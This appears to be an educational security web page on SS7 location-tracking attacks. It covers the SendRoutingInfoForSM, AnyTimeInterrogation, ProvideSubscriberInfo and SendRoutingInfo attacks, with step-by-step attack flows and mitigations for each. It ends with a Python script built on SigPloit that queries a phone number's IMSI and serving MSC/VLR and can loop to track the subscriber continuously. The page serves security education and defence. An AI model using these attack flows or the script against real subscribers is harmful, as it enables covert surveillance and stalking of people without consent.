Understanding Location Tracking

SS7 location tracking attacks represent a severe privacy violation, allowing attackers to determine a mobile subscriber's physical location without their knowledge or consent.

Privacy Implications
Unauthorized Tracking
Complete location surveillance without consent
Pattern-of-Life Analysis
Behavioral profiling and movement patterns
Stalking & Harassment
Facilitating dangerous surveillance
Corporate Espionage
Tracking executives and employees
Law Enforcement Impersonation
Unauthorized access to location data
Technical Prerequisites
SS7 Network Access
Direct or compromised operator access
Target Information
MSISDN, IMSI, and current VLR
Message Crafting
SS7 protocol manipulation skills
GT Spoofing
Global Title impersonation capability
Protocol Knowledge
Understanding of MAP operations

Location Tracking Techniques

Explore the sophisticated methods attackers use to track subscriber location through SS7 vulnerabilities

SendRoutingInfoForSM Attack
Exploits SMS routing queries to reveal subscriber location information through MSC/VLR addresses
High Impact
Low Complexity
SMS Routing Exploitation

Technical Details

This attack exploits the SendRoutingInfoForSM (SRI-SM) MAP operation, which is legitimately used by the SMS service center (SMSC) to query the HLR for routing information needed to deliver SMS messages.

The attacker sends an SRI-SM request to the target's home network HLR, impersonating a legitimate SMSC. The HLR responds with the target's IMSI and current serving MSC/VLR address, which reveals the subscriber's location at the network level.

By mapping the MSC/VLR address to a physical location (using public databases or proprietary knowledge), the attacker can determine the subscriber's approximate location.

Attack Flow

  1. Attacker obtains target's MSISDN (phone number)
  2. Attacker crafts a SendRoutingInfoForSM message with the target MSISDN
  3. Message is sent to target's home network HLR
  4. HLR processes the request without adequate authentication
  5. HLR responds with IMSI and serving MSC/VLR address
  6. Attacker maps MSC/VLR address to physical location
  7. Attacker can repeat the process to track movement over time

Mitigation Strategies

Implement SMS Home Routing, filter SRI-SM requests, monitor patterns

  • Implement SMS Home Routing architecture
  • Filter SRI-SM requests based on source GT
  • Monitor for unusual patterns of SRI-SM requests
  • Implement SS7 firewall rules specific to SRI-SM operations
  • Return generic routing information instead of actual MSC/VLR addresses
AnyTimeInterrogation Attack
Uses ATI MAP operation to query subscriber information directly from HLR at any time
Critical Impact
Medium Complexity
Direct HLR Query

Technical Details

The AnyTimeInterrogation (ATI) MAP operation was designed to allow certain network entities to query subscriber information directly from the HLR at any time, regardless of the subscriber's status.

An attacker can send an ATI request to the target's HLR, impersonating a legitimate network entity (such as a gsmSCF service). The request can include parameters to specifically request location information.

The HLR responds with detailed location information, potentially including cell ID, which can provide location accuracy down to a few hundred meters in urban areas.

Attack Flow

  1. Attacker obtains target's MSISDN (phone number)
  2. Attacker crafts an AnyTimeInterrogation message with the target MSISDN
  3. Attacker spoofs a legitimate service entity (gsmSCF) as the source
  4. Message is sent to target's home network HLR
  5. HLR processes the request without adequate authentication
  6. HLR responds with detailed location information
  7. Attacker can repeat the process for real-time tracking

Mitigation Strategies

Block ATI from unauthorized sources, implement strict whitelist, consider disabling

  • Block ATI requests from unauthorized sources
  • Implement strict whitelist for entities allowed to use ATI
  • Monitor for ATI requests patterns
  • Consider completely disabling ATI if not required for operations
  • Implement additional authentication for ATI operations
ProvideSubscriberInfo Attack
Queries VLR/SGSN for precise location data including cell ID and timing information
Critical Impact
High Complexity
Precise Location Query

Technical Details

The ProvideSubscriberInfo (PSI) MAP operation allows certain network entities to request detailed subscriber information, including precise location data, from the VLR/SGSN.

An attacker first needs to determine which VLR is serving the target (using SRI-SM or other methods), then sends a PSI request to that VLR, impersonating the target's HLR or another authorized entity.

The VLR/SGSN can respond with highly accurate location information, including cell ID, timing advance, and location age, providing much more precise positioning than other methods.

Attack Flow

  1. Attacker obtains target's MSISDN (phone number)
  2. Attacker first determines target's IMSI and serving VLR (using SRI-SM)
  3. Attacker crafts a ProvideSubscriberInfo message with the target IMSI
  4. Attacker spoofs the target's HLR as the source
  5. Message is sent to the serving VLR/SGSN
  6. VLR/SGSN processes the request without adequate authentication
  7. VLR/SGSN responds with precise location information

Mitigation Strategies

Filter PSI based on source, implement mutual authentication, validate requests

  • Filter PSI requests based on source
  • Implement mutual authentication between VLR and HLR
  • Monitor for unusual patterns of PSI requests
  • Validate that PSI requests come from legitimate HLRs
  • Limit location information in PSI responses
SendRoutingInfo Attack
Exploits call routing queries to reveal network-level location information
Medium Impact
Low Complexity
Call Routing Exploitation

Technical Details

The SendRoutingInfo (SRI) MAP operation is legitimately used during call setup to determine how to route a call to a mobile subscriber.

An attacker sends an SRI request to the target's HLR, impersonating a legitimate GMSC. The HLR queries the serving VLR and returns a Mobile Station Roaming Number (MSRN) allocated by the VLR.

The MSRN contains information about the serving network, which can be mapped to a geographic location. While less precise than other methods, it can still reveal the country, city, or region of the subscriber.

Attack Flow

  1. Attacker obtains target's MSISDN (phone number)
  2. Attacker crafts a SendRoutingInfo message with the target MSISDN
  3. Attacker spoofs a legitimate GMSC as the source
  4. Message is sent to target's home network HLR
  5. HLR queries the serving VLR for an MSRN
  6. HLR responds with the MSRN
  7. Attacker extracts network information from the MSRN
  8. Attacker maps network information to geographic location

Mitigation Strategies

Implement SRI filtering, validate requests, monitor patterns

  • Implement SRI filtering
  • Validate SRI requests against expected call patterns
  • Monitor for unusual volumes of SRI requests
  • Consider implementing SRI proxy for additional security
  • Limit routing information in SRI responses

Exploitation Example

Educational code examples demonstrating SS7 location tracking techniques for security research

Location Tracking via SendRoutingInfoForSM
Python script using SigPloit framework to track a subscriber's location
from sigploit.ss7.tracking import sendRoutingInfoForSM
import logging
import time
from typing import Dict, Optional

# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)

class SS7LocationTracker:
    def __init__(self, target_ip: str, source_pc: int, destination_pc: int):
        self.target_ip = target_ip
        self.source_pc = source_pc
        self.destination_pc = destination_pc
        
    def track_location(self, target_msisdn: str, attacker_gt: str) -> Dict[str, any]:
        """
        Track subscriber location using SRI-SM
        
        Args:
            target_msisdn (str): Target subscriber's phone number
            attacker_gt (str): Attacker's Global Title
            
        Returns:
            dict: Location tracking result with network information
        """
        try:
            # SS7 connection parameters
            ss7_params = {
                'sctp_port': 2905,
                'target_ip': self.target_ip,
                'source_pc': self.source_pc,
                'destination_pc': self.destination_pc,
                'source_ssn': 8,
                'destination_ssn': 6
            }
            
            logger.info(f"Attempting location tracking for MSISDN: {target_msisdn}")
            logger.info(f"Using attacker GT: {attacker_gt}")
            
            # Execute the attack using SigPloit
            result = sendRoutingInfoForSM.track(
                target_msisdn=target_msisdn,
                attacker_gt=attacker_gt,
                **ss7_params
            )
            
            # Log results
            logger.info(f"Tracking status: {result.get('status')}")
            logger.info(f"Target IMSI: {result.get('imsi')}")
            logger.info(f"Serving MSC: {result.get('msc')}")
            logger.info(f"Serving VLR: {result.get('vlr')}")
            
            return result
            
        except Exception as e:
            logger.error(f"Location tracking failed: {str(e)}")
            return {'status': 'failed', 'error': str(e)}
    
    def continuous_tracking(self, target_msisdn: str, attacker_gt: str, 
                          interval: int = 300) -> None:
        """
        Continuously track subscriber location at specified intervals
        
        Args:
            target_msisdn (str): Target subscriber's phone number
            attacker_gt (str): Attacker's Global Title
            interval (int): Tracking interval in seconds (default: 5 minutes)
        """
        logger.info(f"Starting continuous tracking for {target_msisdn}")
        logger.info(f"Tracking interval: {interval} seconds")
        
        while True:
            try:
                result = self.track_location(target_msisdn, attacker_gt)
                
                if result.get('status') == 'success':
                    logger.info(f"Location update: {result}")
                else:
                    logger.warning(f"Tracking failed: {result.get('error')}")
                
                time.sleep(interval)
                
            except KeyboardInterrupt:
                logger.info("Continuous tracking stopped by user")
                break
            except Exception as e:
                logger.error(f"Continuous tracking error: {str(e)}")
                time.sleep(interval)

# Example usage
if __name__ == "__main__":
    # Target MSISDN (phone number)
    target = '31612345678'
    
    # Attacker's GT (Global Title)
    attacker_gt = '31111111111'
    
    # Initialize tracker
    tracker = SS7LocationTracker(
        target_ip='10.0.0.1',
        source_pc=1,
        destination_pc=2
    )
    
    # Single location query
    result = tracker.track_location(target, attacker_gt)
    print(f"Location tracking result: {result}")
    
    # Uncomment for continuous tracking
    # tracker.continuous_tracking(target, attacker_gt, interval=300)

Ethical Considerations

This code is provided for educational purposes only. Unauthorized tracking of individuals is illegal in most jurisdictions and violates privacy rights. Always obtain proper authorization before conducting security testing on telecommunications networks.

Legal Requirements: Written permission from network operator, compliance with local laws, and adherence to responsible disclosure practices are mandatory.

Detection & Prevention

Comprehensive strategies to detect and prevent SS7 location tracking attacks

Detection Strategies

Prevention Measures

Related Resources

Explore related SS7 security topics and advanced attack vectors